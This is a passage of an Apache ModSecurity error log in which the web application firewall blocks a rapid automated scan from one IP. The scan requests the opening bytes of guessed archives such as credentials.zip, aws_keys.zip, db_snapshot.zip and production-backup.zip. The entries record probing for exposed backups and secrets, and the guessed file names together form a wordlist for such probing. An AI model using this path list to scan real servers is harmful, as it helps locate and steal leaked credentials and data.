"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/store.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4PwAAAAk"] [Sun Mar 08 19:04:40.733646 2026] [:error] [pid 7010:tid 7059] [client 35.189.151.148:37890] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/tmp.zip"] [unique_id "aa2sKJq2Bzew8vjPgCG-eQAAAZY"] [Sun Mar 08 19:04:40.734927 2026] [:error] [pid 13473:tid 13551] [client 35.189.151.148:41814] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/classes.zip"] [unique_id "aa2sKEwwZGElJGd8aN_6KQAAAJY"] [Sun Mar 08 19:04:40.734969 2026] [:error] [pid 13471:tid 13495] [client 35.189.151.148:38250] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/yearly_backup.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4QAAAABQ"] [Sun Mar 08 19:04:40.735478 2026] [:error] [pid 13471:tid 13496] [client 35.189.151.148:37820] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wordpress-2024.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4QQAAABU"] [Sun Mar 08 19:04:40.735486 2026] [:error] [pid 29564:tid 29590] [client 35.189.151.148:42684] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/whm.zip"] [unique_id "aa2sKAemqWLB0zKFm0TYUgAAARI"] [Sun Mar 08 19:04:40.736874 2026] [:error] [pid 13471:tid 13493] [client 35.189.151.148:38350] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/htaccess.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4QgAAABI"] [Sun Mar 08 19:04:40.736916 2026] [:error] [pid 13605:tid 13611] [client 35.189.151.148:39636] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/2025-backup.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfvgAAAMQ"] [Sun Mar 08 19:04:40.736917 2026] [:error] [pid 11078:tid 11112] [client 35.189.151.148:41576] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/magento-backup.zip"] [unique_id "aa2sKH-dmvIeGeY060kisQAAAcI"] [Sun Mar 08 19:04:40.737779 2026] [:error] [pid 7010:tid 7056] [client 35.189.151.148:39846] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/special.zip"] [unique_id "aa2sKJq2Bzew8vjPgCG-egAAAZM"] [Sun Mar 08 19:04:40.737790 2026] [:error] [pid 11078:tid 11125] [client 35.189.151.148:40930] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive_7.zip"] [unique_id "aa2sKH-dmvIeGeY060kisgAAAc8"] [Sun Mar 08 19:04:40.737795 2026] [:error] [pid 13471:tid 13485] [client 35.189.151.148:37510] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/misc.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4QwAAAAo"] [Sun Mar 08 19:04:40.739023 2026] [:error] [pid 13472:tid 13517] [client 35.189.151.148:40380] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-2024.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9BQAAAEw"] [Sun Mar 08 19:04:40.739056 2026] [:error] [pid 13471:tid 13475] [client 35.189.151.148:41232] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/process.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4RAAAAAA"] [Sun Mar 08 19:04:40.739809 2026] [:error] [pid 13472:tid 13530] [client 35.189.151.148:38128] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backups_website.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9BgAAAFI"] [Sun Mar 08 19:04:40.739810 2026] [:error] [pid 13471:tid 13499] [client 35.189.151.148:42518] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/invoices.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4RQAAABg"] [Sun Mar 08 19:04:40.739853 2026] [:error] [pid 7010:tid 7050] [client 35.189.151.148:41322] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup2.zip"] [unique_id "aa2sKJq2Bzew8vjPgCG-ewAAAY0"] [Sun Mar 08 19:04:40.739928 2026] [:error] [pid 13605:tid 13622] [client 35.189.151.148:38104] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/service.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfvwAAAM8"] [Sun Mar 08 19:04:40.741902 2026] [:error] [pid 13471:tid 13487] [client 35.189.151.148:38330] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-cloudwatch.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4RgAAAAw"] [Sun Mar 08 19:04:40.750361 2026] [:error] [pid 13471:tid 13498] [client 35.189.151.148:38864] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_testing.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4RwAAABc"] [Sun Mar 08 19:04:40.762667 2026] [:error] [pid 12902:tid 12948] [client 35.189.151.148:42256] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/back_up.zip"] [unique_id "aa2sKGaTUOdovAC89_RAuwAAAo0"] [Sun Mar 08 19:04:40.762671 2026] [:error] [pid 13471:tid 13478] [client 35.189.151.148:39168] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/downloads.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4SAAAAAM"] [Sun Mar 08 19:04:40.762694 2026] [:error] [pid 13472:tid 13541] [client 35.189.151.148:42752] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/production-backup.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9BwAAAFc"] [Sun Mar 08 19:04:40.764769 2026] [:error] [pid 11078:tid 11122] [client 35.189.151.148:42076] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-terraform.zip"] [unique_id "aa2sKH-dmvIeGeY060kiswAAAcw"] [Sun Mar 08 19:04:40.764782 2026] [:error] [pid 13471:tid 13477] [client 35.189.151.148:39818] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_ami_backup.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4SQAAAAI"] [Sun Mar 08 19:04:40.764833 2026] [:error] [pid 13605:tid 13618] [client 35.189.151.148:44016] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_keys.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfwQAAAMs"] [Sun Mar 08 19:04:40.764853 2026] [:error] [pid 13473:tid 13518] [client 35.189.151.148:38526] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/development.zip"] [unique_id "aa2sKEwwZGElJGd8aN_6KgAAAII"] [Sun Mar 08 19:04:40.765936 2026] [:error] [pid 13473:tid 13533] [client 35.189.151.148:40604] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/credentials.zip"] [unique_id "aa2sKEwwZGElJGd8aN_6KwAAAIo"] [Sun Mar 08 19:04:40.765969 2026] [:error] [pid 13471:tid 13489] [client 35.189.151.148:43992] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-2026.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4SgAAAA4"] [Sun Mar 08 19:04:40.765983 2026] [:error] [pid 13472:tid 13511] [client 35.189.151.148:44178] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/db_snapshot.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9CAAAAEg"] [Sun Mar 08 19:04:40.766005 2026] [:error] [pid 11078:tid 11123] [client 35.189.151.148:37850] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/videos.zip"] [unique_id "aa2sKH-dmvIeGeY060kitAAAAc0"] [Sun Mar 08 19:04:40.766046 2026] [:error] [pid 12902:tid 12939] [client 35.189.151.148:37842] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/accounting.zip"] [unique_id "aa2sKGaTUOdovAC89_RAvAAAAoQ"] [Sun Mar 08 19:04:40.766090 2026] [:error] [pid 7010:tid 7045] [client 35.189.151.148:40022] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/local.zip"] [unique_id "aa2sKJq2Bzew8vjPgCG-fAAAAYg"] [Sun Mar 08 19:04:40.766324 2026] [:error] [pid 7010:tid 7038] [client 35.189.151.148:39472] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_5.zip"] [unique_id "aa2sKJq2Bzew8vjPgCG-fQAAAYE"] [Sun Mar 08 19:04:40.766359 2026] [:error] [pid 13471:tid 13497] [client 35.189.151.148:37492] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/restapi.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4SwAAABY"] [Sun Mar 08 19:04:40.773656 2026] [:error] [pid 13471:tid 13482] [client 35.189.151.148:41610] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive_9.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4TAAAAAc"] [Sun Mar 08 19:04:40.773656 2026] [:error] [pid 13605:tid 13620] [client 35.189.151.148:38776] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.svn.zip"] [unique_id "aa2sKDLobmDOvyRcAEhfwgAAAM0"] [Sun Mar 08 19:04:40.775143 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:41764] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.config.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4TQAAAA8"] [Sun Mar 08 19:04:40.775147 2026] [:error] [pid 13472:tid 13521] [client 35.189.151.148:39430] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/adminpanel.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9CQAAAE4"] [Sun Mar 08 19:04:40.775152 2026] [:error] [pid 13472:tid 13505] [client 35.189.151.148:41524] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-cloud.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9CgAAAEM"] [Sun Mar 08 19:04:40.869264 2026] [:error] [pid 13472:tid 13523] [client 35.189.151.148:42726] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sent.zip"] [unique_id "aa2sKF3UyizU6P-l0YL9CwAAAE8"] [Sun Mar 08 19:04:40.874463 2026] [:error] [pid 13471:tid 13491] [client 35.189.151.148:38584] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 